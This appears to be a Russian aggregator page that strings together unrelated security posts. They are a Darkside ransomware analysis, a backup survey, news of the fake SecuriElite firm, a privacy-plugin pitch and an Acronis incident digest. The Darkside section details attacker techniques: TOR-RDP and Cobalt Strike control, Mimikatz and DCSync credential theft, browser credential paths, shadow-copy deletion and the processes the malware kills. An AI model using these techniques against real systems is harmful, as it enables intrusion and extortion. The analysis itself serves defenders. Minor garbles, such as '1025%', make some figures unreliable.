Представители данной организации публично заявили, что предпочитают атаковать не больницы, школы, некоммерческие организации и государственные органы, а крупные организации, которые в состоянии заплатить большие выкупы.

Благодаря методу обратного инжиниринга мы выявили, что вредоносное ПО Darkside проверяет языковые параметры устройства, чтобы не атаковать российские организации. Представители группы также отвечали на вопросы форумов на русском языке и сейчас активно набирают в свою команду русскоязычных партнеров.

У группы есть наборы инструментов как для Windows, так и для Linux. У Darkside есть партнерская программа наподобие NetWalker и REvil, которая предлагает всем, кто помогает распространять их вредоносное ПО, 1025% от суммы выкупа.

Анатомия кибератак


Атаки программы-вымогателя Darkside отличаются использованием скрытых приемов, особенно на начальных этапах. После проведения тщательной разведки группа приняла меры для того, чтобы контролируемые устройства и конечные точки не могли определить ее инструменты и способы атаки.

Несмотря на то, что хакеры используют несколько вариантов внедрения в систему, действия внутри нее довольно стандартны, а успешный результат достигается с холодной непоколебимостью.

Тактика скрытности включает:


  • Управление и контроль TOR
  • Избегание узлов, контролируемых EDR
  • Выжидание подходящего времени и откладывание подозрительных действий для более поздних этапов атаки
  • Индивидуальный код и хосты соединения для каждой жертвы атаки
  • Техники обфускации, такие как шифрование и загрузка динамической библиотеки
  • Контркриминалистические методы, такие как удаление файлов журналов


На более поздних этапах атак:


  • Сбор учетных данных, хранящиеся в файлах, памяти и на контроллерах домена
  • Использование файловых ресурсов для распространения инструментов вирусной атаки и хранения файловых архивов
  • Ослабление ограничений доступа к общим файловым ресурсам для упрощения сбора учетных данных
  • Удаление резервных копий, включая теневые
  • Внедрение индивидуального вируса-вымогателя


Первый этап внедрения: поиск слабого звена


Программа-вымогатель Darkside изначально проникает в систему через слабые места: удаленно управляемые учетные записи и системы.

Мы выявили, что группа Darkside использовала скомпрометированные учетные записи подрядчиков для проникновения в инфраструктуру виртуальных рабочих столов (VDI), которая была создана для упрощения удаленного доступа во время пандемии. Хотя сами подрядчики этого не делали.

Хакеры также использовали серверы, а затем оперативно устанавливали дополнительный RDP, который сохраняет доступ, даже если уязвимость сервера устранена.

Ни один из этих вариантов не является новым они выступают предупреждением о том, что опытные злоумышленники способны легко обойти защиту периметра сети. Это иллюстрирует необходимость многофакторной аутентификации для всех учетных записей и оперативного устранения уязвимостей систем, подключенных к Интернету.

Управление и контроль




Хакеры-вымогатели Darkside создали механизмы управления и контроля в основном с помощью клиента RDP, работающего через порт 443, маршрутизируемого через TOR. После установки браузера Tor они изменили его конфигурацию, чтобы он функционировал как постоянная служба, перенаправляя трафик, отправляемый на локальный (динамический) порт с помощью TOR по HTTPS через порт 443. Такие соединения были постоянными, поэтому злоумышленники могли устанавливать сессии RDP на взломанных хостах и через них, облегчая перемещение внутри сети.

Мы обнаружили присутствие пользователей TOR на многих серверах с десятками активных соединений.
Хакеры использовали Cobalt Strike как вторичный механизм управления и контроля. Мы проанализировали десятки настраиваемых стейджеров, которые загружали маяки, подключенные к определенным серверам. Стейджеры (под названием file.exe) устанавливались удаленно на определенных целевых устройствах с использованием WinRM, каждое из которых было настроено по-разному. Стейджеры Cobalt-Strike установили соединение с выделенным сервером C2 для загрузки Cobalt Strike Beacon.

Злоумышленники обычно используют всего несколько серверов C2 для каждой жертвы, но хакеры Darkside настроили каждый маяк для подключения к другому серверу C2 с другим пользовательским агентом. Это может свидетельствовать о том, что Darkside управляет крупной, хорошо налаженной системой хакерских атак.

Для упрощенного распространения стейджеры и исполняемые файлы TOR хранились в общих сетевых папках. Хакеры старались не устанавливать бэкдоры в системах, контролируемых решениями EDR.


Обнаружение загрузки маяка на взломанный сервер

Мы наблюдали, как злоумышленники входят в систему виртуального рабочего стола, используя сразу несколько учетных записей. Каждый раз, когда хакер входил в систему, во взломанных домашних каталогах пользователя создавались файлы .lnk. Действия с файлами .lnk помогли выявить взломанные учетные записи и среды VDI, а также время использования в атаке каждой учетной записи.

Разведка и сбор учетных данных


Вирус-вымогатель Darkside известен тем, что живет за счет жертвы. По нашим наблюдениям, он сканирует сети, запускает команды, создает дампы процессов и крадет учетные данные. Инструменты атаки применялись на хостах с минимальной вероятностью обнаружения и блокировки. Среди широко известных инструментов advanced_ip_scanner.exe, psexec, Mimikatz и другие.

Хакеры предприняли много попыток для получения доступа к дополнительным системам и учетным записям, начиная с первоначальных взломанных хостов, тикет-систем и соединений NTLM. После периода выжидания злоумышленники использовали разведывательный инструмент Active Directory (ADRecon.ps1) для сбора дополнительной информации о пользователях, группах и привилегиях, сохраняя результаты в файле под названием DC.txt. Все инструменты были удалены после использования. Злоумышленники временно сохранили результаты разведки и учетные данные на активном сервере Windows. Среди интересных имен файлов, записываемых и удаляемых на сервере, были такие: Typed_history.zip, Appdata.zip, IE_Passwords.zip, AD_intel и ProcessExplorer.zip.

Помимо сбора учетных данных злоумышленники извлекли учетные данные из папок профиля пользователя, в том числе:
Users\\Appdata\[Roaming\Local]\Microsoft [Credentials\Vault]
Users\\Appdata\Roaming\Mozilla\Firefox\Profiles
Users\\\Appdata\Local\Google\Chrome

Злоумышленники использовали Invoke-mimikatXz.ps1 для извлечения учетных данных с неконтролируемых серверов и сохранили их в файле под именем dump.txt. Эта операция была направлена на очень важную жертву c минимальной вероятностью обнаружения.



Как только злоумышленники получили учетные данные администратора домена, им открылся доступ и к контроллерам домена. На более поздних этапах хакеры осуществили хорошо известную атаку DCSync, при которой злоумышленник выдает себя за правомерного контроллера домена и использует службу репликации каталогов для копирования информации AD и получения доступа к данным паролей всего домена, в том числе KRBTGT HASH.

Сбор данных и стейджинг


Активный сервер Windows также служил концентратором для хранения данных перед их эксфильтрацией. Данные извлекались с сотен серверов с помощью пакетной программы (dump.bat), расположенной в \Desktop\Dump, которая записывала файлы в одно и то же место, сжимая их в архивы 7zip с простыми названиями *.7z.[001]-[999].
Несмотря на то что хакеры накопили повышенные привилегии, мы обнаружили, что они ослабили ограничения файловых систем, чтобы получить доступ к файлам с помощью любой учетной записи пользователя домена. Командный файл, целевые данные и архивы были удалены в течение нескольких часов после их извлечения.

Шифрование


Darkside не внедряет программы-вымогатели до обследования среды, извлечения полезных данных, получения контроля над привилегированными учетными записями и определения всех систем резервного копирования, серверов и приложений. Мы выявили несколько подключений к резервным хранилищам с использованием взломанных учетных записей служб незадолго до шифрования данных. Откладывая фазу шифрования, хакеры получают возможность максимизировать ущерб жертв атаки и свою прибыль.

Код вымогателя передается через установленные бэкдоры (лазейки) (TOR-RDP или Cobalt Strike) и модифицируется отдельно для каждой жертвы. Полезная нагрузка содержит исполняемый файл, уникальное расширение и уникальный идентификатор жертвы, который дает ей доступ к веб-сайту Darkside для произведения оплаты.

Используя уникальные исполняемые файлы и расширения, программа-вымогатель легко обходит сигнатурный поиск. Darkside также предлагает программы-вымогатели другим злоумышленникам под заказ (программа-вымогатель как услуга) и получает часть прибыли от успешных кибератак.

Одна из версий индивидуального кода получила название Homie.exe. По нашим данным, он не только настраивается индивидуально, но и защищен от криминалистического анализа и отладки технологиями для самовнедрения, обнаружения виртуальных машин и динамической загрузки библиотеки. Он также удаляет теневые копии на устройствах жертв.

Вирус-вымогатель Darkside. Этап 1: самовнедрение


При активации вредоносное ПО копируется в папку C:\Users\admin\AppData\Local\Temp\ и вставляет свой код в существующий процесс с помощью команды CMD:



Если вредоносная программа обнаруживает признаки отслеживания или обнаружения запуска на виртуальном устройстве, она сразу же прекращает работу.
Чтобы избежать обнаружения инструментами AV и EDR, программа-вымогатель динамически загружает свои библиотеки, не регистрируя их в разделе импорта:



Импортируются только 3 библиотеки, что свидетельствует о том, что имена других библиотек распознаются динамически во время запуска вредоносной программы без непосредственного импорта.

Вирус-вымогатель. Этап 2: удаление теневых копий


Вредоносное ПО пытается удалить теневые копии на устройстве жертвы обфусцированной командой PowerShell:



Деобфусцированная команда:



Вирус-вымогатель. Этап 3: шифрование файлов


После удаления теневых копий вредоносное ПО сначала останавливает определенные процессы во избежание блокировки файлов, которые могут задерживать шифрование, а затем сама запускает его.

Список процессов:


sql
oracle
ocssd
dbsnmp
synctime
agntsvc
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
encsvc
Firefox
tbirdconfig
mydesktopqos
ocomm
dbeng50
sqbcoreservice
Excel
infopath
msaccess
mspub
onenote
Outlook
powerpnt
steam
thebat
thunderbird
visio
winword
wordpad
notepad

Во время шифрования вредоносное ПО добавляет строку из 8 символов к зашифрованным именам файлов.



Программы-вымогатели Darkside избегают шифрования файлов со следующими расширениями:
386,adv,ani,bat,bin,cab,cmd,com,cpl,cur,deskthemepack,diagcab,diagcfg,diagpkg,dll,drv,exe,hlp,icl,icns,ico,ics,idx,ldf,lnk,mod,mpa,msc,msp,msstyles,msu,nls,nomedia,ocx,prf,ps1,rom,rtp,scr,shs,spl,sys,theme,themepack,wpx,lock,key,hta,msi,pdb


Программа-вымогатель создает инструкции по выкупу (READMEtxt), чтобы жертва могла связаться с создателем вируса для расшифровки файлов:



Как защититься от опасных злоумышленников в 2021 году



Найдите и устраните слабые звенья до того, как это сделают хакеры


Любая учетная запись, для которой не требуется многофакторная аутентификация, может быть взломана простой атакой методом перебора паролей. Любой подключенный к Интернету сервер с неустраненной уязвимостью источник легкого дохода хакера.

Предотвращайте попытки взлома и устраняйте уязвимости внутри системы


Злоумышленники ищут быстрые способы получить учетные данные администратора домена. Слабо зашифрованные учетные записи служб или администраторов с SPN или, что еще хуже, привилегированные учетные записи со слабыми требованиями к паролю или без них слишком легкие цели.

Во многих организациях злоумышленникам для сбора сведений даже не нужны данные привилегированной учетной записи: обычный сотрудник имеет доступ к гораздо большему количеству информации, чем нужно. Доступ к конфиденциальным данным должны иметь только учетные записи, отвечающие определенным требованиям. Также рекомендуется регулярно отслеживать файловые системы на предмет необычного доступа и изменений.

Пролейте свет на слепые зоны там может быть много интересного


Организации с комплексными инструментами мониторинга быстрее обнаруживают и расследуют подобные атаки. Если у вас есть слепые зоны в основных хранилищах данных, Active Directory, DNS, системах удаленного доступа или веб-соединениях, вам будет сложно определить, какие системы были скомпрометированы и были ли украдены конфиденциальные данные.

Если вы обнаружите вторжение, позвольте Active Directory очертить его радиус


События службы каталогов Active Directory помогают быстро определить взломанные учетные записи и устройства. Выполните запрос Active Directory для поиска признаков перемещения внутри этой учетной записи (или записей).
Подробнее..

Cyber Protection Week 3 самых интересных вывода про ИБ для частных пользователей

13.04.2021 08:08:24 | Автор: admin

2 апреля 2021 года закончилось ежегодное мероприятие Cyber Protection Week, которая раньше называлась BackUp Day. За последние годы пришлось уйти от формата одного дня, потому что тем для обсуждения стало очень много, и вести разговор не только о бэкапе, но и о других аспектах киберзащиты. Сегодня мы делимся основными выводами, которые были сделаны по итогам Cyber Protection Week 2021 с учетом исследований и опросов участников мероприятия.

В этому году в рамкахCyber Protection Week был проведен опрос 2200 пользователей из 22 разных стран на 6 континентах, и в этом посте мы хотим поделиться его результатами. Помимо традиционных вопросов мы хотели узнать, как на людей повлияли события прошлого года пандемия COVID, введенные в разных странах локдауны и ограничения. В прошлом мы уже писали о том, что сами тема коронавируса создала повод для множества манипуляций и кибератак. Но было интересно узнать, как сами пользователи оценивают динамику угроз, с которыми им пришлось столкнуться в реальности. Ведь во время самоизоляции зависимость от сохранности данных и цифровых сервисовзначительно возросла.

1.Потерь данных становится все больше, а уровень защиты падает

Опрос показал, что каждый десятый пользователь не проводит резервное копирование своих данных и не устанавливает такие системы на свои устройства. Эти люди, как правило, считают, что не могут потерять свои данные или полагают, что для них это будет не критично.

При этом персональных пользователей, которые в действительности практикуют резервное копирование, занимались их восстановлением. Таким образом, проблема потери данных действительно существует среди частных пользователей. Но, что самое печальное, у 79% из них процесс восстановления в итоге занимал до 12 часов, на протяжении которых люди пытались получить доступ к своим системам и файлам. Возможно, это связано с тем, что процедура восстановления производится относительно редко, а возможно с недостаточно продуманным процессом самого бэкапа.

В любом случае, по сравнению с прошлым годом случаев потери данных частными пользователями стало больше. Почти 75% сталкивались с перманентной потерей данных, которые им не удалось восстановить. И этот показатель будет только расти для тех, кто продолжает жить без каких-либо решений для защиты данных.

2. Пользователи оказались не в курсе большинства угроз

При том, что за время пандемии количество кибератак выросло на 400%, исследование показало, что почти 25% частных пользователей вообще не слышали о программах-вымогателях, крпито-джекинге, DoS / DDoS атаках или взломах интернета вещей. Для читателей Хабра это может показаться странным, но значительная часть обычных пользователей вообще не в курсе, что может произойти с их данными. И эти результаты исследования Cyber Protection Week Report напрямую коррелируют с объемами потери данных частными пользователями.

Почти 40% частных пользователей отметили, что они даже не поняли бы, если бы к их данным кто-то получил доступ или изменил их. Этот показатель вырос на 10% по сравнению с результатами Cyber Protection Week 2020 года. Еще больше людей (43%) не знают, может ли установленное защитное ПО противодействовать атакам нулевого дня. И это серьезная проблема, ведь с учетом использования искусственного интеллекта и готовых конструкторов, специалисты каждый день обнаруживают350 000 новых разновидностей вредоносного ПО. Получается, чтьо каждый подобный экземпляр может скомпрометировать данные плохо защищенных пользователей.

3.Безопасность обычных пользователей чаще всего зависит от автоматических процедур

Да, сегодня многие пользователи совершают определенные действия, чтобы защитить свою приватность в сети. Однако эти шаги, как правило, не выходят за рамки базовых процедур, которые применяются автоматически или даже принудительно. Например, люди устанавливают более сложные пароли, потому что без них нельзя зарегистрироваться, включают защиту сетей Wi-Fi и многофакторную аутентификацию в приложениях, если им настоятельно рекомендовали это сделать.

И хотя мы наблюдаем 20% рост количества пользователей, применяющих облачный бэкап, по сравнению с прошлым годом, в основном это происходит потому, что многие цифровые сервисы стали выполнять его автоматически. Увы, пользователи редко выходят за пределы этих базовых шагов, потому что для более тонкой защиты необходимо совершать проактивные действия и быть в курсе как самих угроз, так и того урона, который они могут нанести.

Заключение

Растущий спектр угроз одновременно с низкой осведомленностью пользователей, не слишком глубоко погружающихся в ИТ, создает прекрасные условия для новых атак и манипуляций с данными. Учитывая неутешительную статистику, вредоносное ПО все чаще находит способ попасть на компьютер жертвы, так что мы рекомендуем помочь своим друзьям и родственникам нормально настроить киберзащиту, чтобы они не стали очередными жертвами киберпреступников.

Подробнее..

Хакеры создали подставную фирму SecuriElite, чтобы атаковать исследователей безопасности и других хакеров

21.04.2021 16:08:09 | Автор: admin

Сайт несуществующей компании SecuriElite

В январе 2021 года специалисты Google Threat Analysis Group (TAG) рассказали об атаке на исследователей ИТ-безопасности по всему миру. Теперь опубликованы некоторые подробности этой необычной операции.

Злоумышленники использовали новые 0-day, которые срабатывают в последних версиях Windows 10 и Chrome. Кроме того, исследователям предлагали поучаствовать в совместном проекте Visual Studio и по их запросу предоставляли DLL якобы с кодом эксплоита (хэш DLL на VirusTotal). Такой вектор социальной инженерии встречается впервые в мире.

Как показало расследование, хакерская группа контактировала с исследователями безопасности через поддельные аккаунты в социальных сетях Twitter и LinkedIn.



Фейковые профили пользователей LinkedIn и Twitter

Более того, они создали поддельную компанию под названием SecuriElite, которая базируется в Турции и якобы приглашает экспертов по безопасности. Как сообщается, компания предлагает услуги offensive security, включая пентесты, оценку безопасности программного обеспечения и эксплоиты.

В общей сложности Google идентифицировала восемь аккаунтов Twitter и семь профилей LinkedIn, которые участвовали в операции. Блог с интересной информацией на тему ИБ для привлечения целевой аудитории был запущен в 2020 году.


Блог с интересной информацией для привлечения исследователей по безопасности

Для операции были зарегистрированы профили на ряде платформ, включая Telegram, Keybase и Discord, чтобы общаться с исследователями и завоевать их доверие.

14 января 2021 года злоумышленники опубликовали в Twitter и на YouTube видео с демонстрацией эксплоита для недавно закрытой уязвимости в Windows Defender (CVE-2021-1647).



Если кто-то из исследователей по безопасности заглотил наживку, ему предлагали поучаствовать в совместном проекте Visual Studio. Это новый метод социальной инженерии, который ранее ещё не встречался.


Хакеры обещали, что в проекте Visual Studio будет код эксплоита, показанного на видео, и предоставляли DLL, которая исполнялась через Visual Studio Build Events. Сразу после этого она устанавливала соединение с удалённым командным сервером.



Сайт SecuriElite запустили 17 марта 2021 года. До этого атака велась только через блог.



Корейские коллеги уже определили уязвимость 0-day, через которую эксплоит срабатывал в Internet Explorer. О других браузерах информации пока нет.



Кроме сайта, атака велась через официальный блог blog.br0vvnn[.]io. Ранее сообщалось, что эксплоит срабатывает в последних версиях Windows 10 и Chrome со всеми патчами. Сейчас антивирусы уже начали его распознавать.

Если избранных жертв индивидуально приглашают на заражённый сайт, то это таргетированный фишинг. Если жертва сама нашла новый интересный сайт, то это немного похоже на атаку типа watering hole (когда взламывается настоящий сайт, которым пользуется целевая группа). Наверное, в данном случае можно говорить о гибридной технике.

Пока непонятно, с какой целью на компьютеры специалистов устанавливали бэкдоры. Возможно, злоумышленники искали информацию о новых 0-day. Это ценный товар на чёрном рынке. Сведения о багах в популярном ПО продаются за сотни тысяч долларов. Уязвимости эксплуатируются несколько месяцев или лет, пока о них не становится известно широкой публике. Если хакер находит серьёзную уязвимость в Windows или iOS он может обеспечить себе безбедное существование на годы вперёд и пожизненный авторитет в сообществе.

Теоретически, жертвой нацеленной атаки может стать каждый, даже эксперт по безопасности, если он не использует для выхода в интернет отдельный компьютер. Антивирусные программы здесь не помогут, скорее наоборот: зачастую они увеличивают поверхность атаки и ухудшают безопасность системы.

Google Threat Analysis Group опубликовала список аккаунтов в соцсетях, адреса командных серверов (в том числе взломанных чужих серверов, которые использовались как командные), хэши DLL для VS Project и индикаторы компрометации (IOCs).




Подробнее..

Recovery mode Nemezida DNT плагин, для защиты от сбора информации

26.04.2021 08:11:20 | Автор: admin

Здравствуй, уважаемый читатель!

Многие из нас слышали о слежке за пользователями в интернете и о сборе персональных данных, некоторые сталкивались с этим не понаслышке.

Неважно, являетесь вы домашним или корпоративным пользователем, все мы посещаем различные сайты, которые в той или иной мере вытягивают с наших устройств информацию о нас. Еще больше данных о себе и своем устройстве вы отдаёте, посещая вредоносные сайты.

Собирая эти данные и обрабатывая их, тот, кто ими завладел, может составить ваш цифровой портрет, состоящий из цифровых отпечатков или следов, оставленных в сети и этим уже занимаются злоумышленники, взломавшие 120 рекламных серверов.

Согласно результатам исследованияEFF (Electronic Frontier Foundation), уникальность отпечатка браузера очень высока, и он содержит в себе нижеописанные данные:

  • user-agent (включая не только браузер, но и версию ОС, тип устройства, языковые настройки, панели инструментов и т.п.);

  • часовой пояс;

  • разрешение экрана и глубину цвета;

  • supercookies;

  • настройки cookie;

  • системные шрифты;

  • плагины к браузеру и их версии;

  • журнал посещений;

  • другие данные.

    Если говорить о статистике, то только раз на 286 777 случаев случается полное совпадение отпечатков браузеров двух разных пользователей.

Согласно ещеодному исследованию, точность идентификации пользователя при помощи отпечатка браузера составляет 99,24%.

Рассмотрим вершину айсберга и приведём простые примеры, что может случиться с собираемыми о вас данными:

сбор данных для ведения статистики;

сбор данных для показа рекламы;

сбор данных для продажи организациям;

сбор данных для осуществления незаконных действий;

сбор данных для проведения целенаправленных атак;

сбор данных для кражи и мошенничества;

многое другое.

А контролируете ли вы передачу этих данных, если да, то как? Какими средствами защиты информации и плагинами вы пользуетесь? На этот вопрос каждый из вас может ответить в комментариях.

Если еще сильнее углубиться в данную проблему, то какие данные могут утекать не только у обычных домашних пользователей, но и у сотрудников компаний? И к чему это может привести? Чтобы ответить на этот вопрос, предлагаю ознакомиться с рисунком 1.

Рисунок 1 Схема формирования цифрового портретаРисунок 1 Схема формирования цифрового портрета

Многие из нас сталкивались с различными проблемами и неприятностями в офисе, и для наилучшего решения этих проблем некоторые прибегают к поиску решения в сети.

Ряд сотрудников IT, юридического, финансового и других отделов уже понимают, о чём речь. И эту информацию мы тоже отдаем неизвестным нам ресурсам, трекерам и маячкам, не говоря уже о злоумышленниках.

А теперь, зная ваш цифровой портрет и владея информацией о проблемах в организации и ее уязвимых точках, что с ней может сделать злоумышленник? Вопрос риторический.

Под прицелом остаются организации, ведущие разработки для оборонно-промышленного комплекса, космонавтики, медицины, научной деятельности и т.д.

Многие компании и их сотрудники становятся уязвимыми для целенаправленных ATP-атак, а это уже влечет за собой более крупные риски и ущерб. Готовы ли мы принимать эти риски?

Согласно проведённому мной опросу, многие руководители, специалисты и рядовые граждане не готовы к этим рискам, так как при их возникновении они сталкиваются или могут столкнуться с рядом проблем:

понижение заработной платы;

лишение премии;

увольнение с работы;

финансовые и репутационные риски организации.

На рисунке ниже вы можете ознакомиться с данными компании PositiveTechnologies за 2019 год и сделать выводы о типах украденных данных. Для статистики были взяты данные за 2019 год, так как отчет за весь 2020 год от PositiveTechnologies еще не сформирован.

Рисунок 2 Типы украденных данных за 2019 годРисунок 2 Типы украденных данных за 2019 год

Этот вопрос мы прояснили, но давайте постараемся ответить на вопрос А как эти данные крадутся ещё?. Для ответа на этот вопрос мы обратимся к статистике от той же организации и рассмотрим ее на рисунке 3.

Рисунок 3 Способы распространения ВПОРисунок 3 Способы распространения ВПО

Помимо сбора информации о нас для формирования цифрового портрета, данные о нас собирают вредоносные сайты, которые не всегда блокируются средствами защиты информации, некоторые даже не оповещают об этом и для закрытия этого вектора угроз нужна эшелонированная защита. На рисунке 3 мы видим, что первые два места по распространению вредоносного ПО занимают веб-сайты и электронная почта.

Для решения этих проблем была начата разработка двух версий продукта Nemezida DNT:

Nemezida DNT Enterprise Edition версия продукта, созданная для более глубокой защиты компаний и корпоративного пользователя.

Nemezida DNT Home Edition бесплатная версия для домашнего пользователя с функцией режима защиты Перископная. Начиная с режима защиты Рабочая, продукт будет монетизироваться.

На рисунке 4 вы можете ознакомиться c функциями продукта, которые планируются к реализации, часть из них уже реализованы.

Рисунок 4 Набор функций в Nemezida DNTРисунок 4 Набор функций в Nemezida DNT

На текущий момент у нас реализован следующий функционал:

подмена Fingerprint;

подмена cookie;

подмена user agent;

VirusTotal;

Cisco Talos.

Последние два модуля будут доработаны, в частности, будет больше информативности о посещенном сайте, также посещение вредоносного сайта будет блокироваться.

Особенность нашей разработки заключается в мультифункциональности, она показана на рисунке 5.

Рисунок 5 Особенности Nemezida DNTРисунок 5 Особенности Nemezida DNTРисунок 6 Список поддерживаемых браузеровРисунок 6 Список поддерживаемых браузеров

Нашими дизайнерами было создано несколько тем для нашего плагина, Home Edition и Enterprise Edition. На рисунке 7 Вы можете ознакомиться с Home Edition темой нашего плагина, она будет доступна по умолчанию для всех режимов защиты, но сменить ее можно будет на другую, только имея лицензию с уровня защиты Рабочая.

Рисунок 7 Дизайн Home EditionРисунок 7 Дизайн Home Edition

Для версии Nemezida DNT Enterprise Edition была разработана тема в трех тонах: Белый, Черный, Синий, с которыми вы можете ознакомиться на рисунках 8, 9 и 10.

Рисунок 8 Белая тема Enterprise EditionРисунок 8 Белая тема Enterprise EditionРисунок 9 Черная тема Enterprise EditionРисунок 9 Черная тема Enterprise EditionРисунок 10 Черная тема Enterprise EditionРисунок 10 Черная тема Enterprise Edition

Перед каждым релизом мы будем тщательно проверять наш продукт на наличие уязвимостей и устранять их в случае, если такие будут найдены. Помимо прочего мы начали писать серверную часть, которая будет заниматься сверкой лицензионных ключей. Важно понимать, что ни наш продукт, ни мы не будем заниматься сбором и накоплением данных, в этом вы и сами сможете убедиться при проверке работы продукта в Wireshark, когда продукт выйдет в релиз.

Многие интересовались, на каком стеке мы ведем разработку нашего продукта, ответ на этот вопрос находится на рисунке 11.

Рисунок 11 Используемый стек технологийРисунок 11 Используемый стек технологий

Ниже вы можете ознакомиться с членами нашей команды, которые участвуют в разработке решения.

Выйти в релиз мы планируем через 3-4 месяца благодаря вашей обратной связи о нашем проекте, прохождению опроса и поддержке разработки на платформе Boomstarter.

В комментариях к этой статье вы можете оставить обратную связь, поделиться информацией, как вы решаете описанную в статье проблему, является ли это для вас реальной проблемой, какие средства защиты используете и какие у них есть плюсы и минусы для вас как для пользователя.

Спасибо за внимание!

Подробнее..

Дайджест киберинцидентов Acronis 1

14.06.2021 16:14:45 | Автор: admin

Привет, Хабр! Начиная с сегодняшнего дня мы будем публиковать еженедельные дайджесты новостей информационной безопасности, рассказывать о новых взломах и угрозах, а также делиться своим опытом глобального наблюдения за киберпреступностью. В этой дайджесте вы узнаете о новых крупных взломах и атаках, маскировке известных группировок, секретах успешного фишинга и о том, сколько патчей Microsoft в июне нужно установить в обязательном порядке.

Для начала скажем несколько слов о том, откуда мы берем информацию об угрозах. Еще несколько лет назад Acronis сформировал глобальную сеть центров кибербезопасности Cyber Protection Operations Centers (CPOCs). Благодаря постоянному мониторингу событий, происходящих в глобальных сетях, а также на рабочих станциях и на серверах наших клиентов, которых насчитывается более 5 миллионов по всему миру.

Оператор речных перевозок попал под атаку Ransomware

Вслед за уже нашумевшими атаками на другие объекты инфраструктуры США, в частности на Colonial Pipeline, произошло заражение Steamship Authority, крупнейшего оператора паромных перевозок в штате Массачусетс.

Steamship Authority выступает в единым регулятором и управляет движением всех паромов между материковой частью Массачусетса и островами Мартаc Виньярд и Нантакет. К счастью, сами перевозки не были парализованы, однако пока нет никакой информации о том, какой выкуп требуют злоумышленники, и как Steamship Authority планирует восстанавливать свои системы после масштабной атаки.

Но самое печальное, что из-за шифрования файлов пока никто не может сказать, насколько чувствительная информация попала в руки злоумышленников. Это еще один аргумент, почему преступники стали все чаще применять Ransomware вместе с программами класса Infostealer жертва находится одновременно под угрозой потери данных и утечки данных. В результате создается больше рисков для бизнеса и выше шанс, что руководство все-таки решится заплатить выкуп.

Это совсем не те вымогатели, которых вы ищете...

После того, как США ввели санкции в 2019 году преступная группировка, известная как Evil Corp, приступила к маскировки и провела небольшой ребрендинг, чтобы скрыть свою активность. Так что даже уже пострадавшие могут снова столкнуться с действиями тех же злоумышленников, но под новым соусом. Напомним, что Evil Corp несет ответственность за ущерб более чем в $100 миллионов, учитывая суммы выкупов и нанесенный вред. Именно они атаковали такие крупные компании как Garmin, Forward Air и страхового магната CNA.

Недавно исследователи обнаружили ряд кибератак, использующих новое вредоносное ПО PayloadBIN и отнесли эти атаки к деятельности другой известной группировки под названием Babuk (они, кстати, перед этим заявили о прекращении своей деятельности). Считалось, что Babuk просто соврали о своем выходе на пенсию. Однако после более детального анализа факты стали указывать на деятельность Evil Corp, которая вполне может стоять за новыми атаками.

Почему это важно? Установление связи между PayloadBIN и Evil Corp позволяет лучше изучить ландшафт киберугроз, а также принять меры к противодействию ведь специалистам по кибербезопасности хорошо известны приемы Evil Corp. Но а для пользователей это еще один аргумент о том, что для реальной борьбы с Ransomware стоит использовать решения с AI, способные обнаруживать неизвестные угрозы.

Семь брешей нулевого дня были закрыты в июньский вторник патчей

В свой вторник патчей Microsoft представил 50 обновлений, включая исправления для семи уязвимостей нулевого дня. Причем на тот момент уже было известно, что шесть из них были использованы киберпреступниками.

Четыре из обнаруженных уязвимостей позволяли получить дополнительные привилегии, одна была способна привести к утечкам информации, а еще одна открывала возможности для удаленного запуска произвольного кода. Седьмая уязвимость никак не проявила себя в виде реальных атак это лазейка для реализации DDoS в сервисах Windows Remote Desktop.

Из 50 патчей, предложенных в начале текущего месяца, 5 штук были признаны Microsoft критически важными, а 45 важными. Среди потенциально уязвимого ПО Microsoft Office, браузер Edge, Visual Studio, .NET Core и ряд других бизнес-приложений.

Подобная ситуация еще раз говорит в пользу технологий патч-менеджмента. Когда уязвимости уже эксплуатируются злоумышленниками лучше всего устанавливать обновления вовремя. Поэтому организациям стоит использовать автоматизированные инструменты управления патчами, чтобы вывести в приоритет загрузку и установку на всех машинах в первую очередь наиболее критичных исправлений.

Ransomware продолжает атаковать компании, связанные с трубопроводным бизнесом

Не успели мы еще забыть о недавней панике и полном отключении систем Colonial Pipeline из-за атаки Ransomware, новости последней недели пополнились нападением на еще один трубопроводный бизнес LineStar Integrity Services.

LineStar Integrity Services это специалисты по аудиту, обслуживанию и другим сервисам для трубопроводных компаний. Ежегодная прибыль этой организации составляет более $171 миллионов. И относительно новая группа Ransomware, известная как Xing Team, украла у сервисной компании 70 Гб данных, часть из которых уже была опубликована на сайтах утечек. В числе скомпрометированной информации более 73 000 электронных писем, бухгалтерская документация, контракты, программный код, технические данные, а также чувствительная информация отдела кадров номера соцстрахования и номера водительских удостоверений.

Атака во многом стала возможной потому, что Xing Team это относительно новая киберпреступная группировка, и образцы Ransomware, которые они используют, еще не были проанализированы многими лабораториями. Таким образом, обеспечить защиту от подобных атак можно только с помощью бихевиористского анализа и блокировки подозрительной активности, похожей на шифрование и кражу файлов.

После успешной атаки на SolarWinds Nobelium ударились в фишинг

Группа Nobelium, ставшая широко известной несколько месяцев назад после атаки на SolarWinds, решила расширить спектр своей деятельности. Киберпреступники запустили масштабную фишинговую кампанию, атакуя около 3000 учетных записей, относящихся к правительственным организациям и консалтинговым компаниям. И хотя основной целью злоумышленников явно были институты США, такие же электронные письма получили адресаты еще в 24 странах.

Преступники получили доступ к сервису Constant Contact (который как раз занимается маркетинговыми рассылками), а именно к учетной записи USAID (United States Agency for International Development). Использование доверенной системы позволило Nobelium создать действительно убедительные фишинговые письма, ведь отправитель входил в число проверенных, а сами сообщения отличались корректными заголовками.

В письмах была информация о новых документах, якобы свидетельствующих о подтасовках на выборах в США. Однако переход по ссылке приводил к загрузке вредоносного файла ISO. После его загрузки файл устанавливал в систему вредоносную библиотеку DLL, которая на самом деле являлась бэкдором Cobalt Strike.

Здесь стоит отметить, что подобные атаки вообще становятся возможны из-за низкого уровня использования механизмов URL-фильтрации в корпоративных системах защиты. Исследование Acronis Cyber Readiness 2020 показало, что в на подобные решения бюджет выделяется только 2% компаний. Поэтому не стоит удивляться, если кибермошенники будут использовать подобные методы работы чаще.

Подробнее..

Транспортный агент MS Exchange для защиты от вирусов и нежелательной почты

18.06.2021 12:04:53 | Автор: admin

